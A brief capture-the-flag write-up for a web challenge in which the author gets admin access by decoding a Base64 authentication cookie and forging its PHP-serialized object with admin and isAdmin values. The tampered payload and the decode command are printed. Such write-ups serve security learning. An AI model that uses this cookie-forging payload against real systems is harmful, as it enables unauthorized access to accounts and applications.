AISEC Finals writeups

Challenge 1: Security_system

Description :

just a web page, The goal was to bypass authentication.

Solution

I don't recall all the details as the challenge is no longer accessible, but the key was a client-side cookie used for authentication. It was Base64-encoded. I decoded it, understood the structure, and modified the content. That gave me admin access and the flag. Payload used is shown below:

└─$ echo "Tzo2OiJBY2Nlc3MiOjM6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6NzoiaXNBZG1pbiI7YjoxO3M6NzoiY29udGV4dCI7YToyOntzOjQ6ImZsYWciO2I6MTt9fQo=" | base64 -d
O:6:"Access":3:{s:8:"username";s:5:"admin";s:7:"isAdmin";b:1;s:7:"context";a:2:{s:4:"flag";b:1;}}

Flag

CRISIS{.....}

[Continue with more challenges...]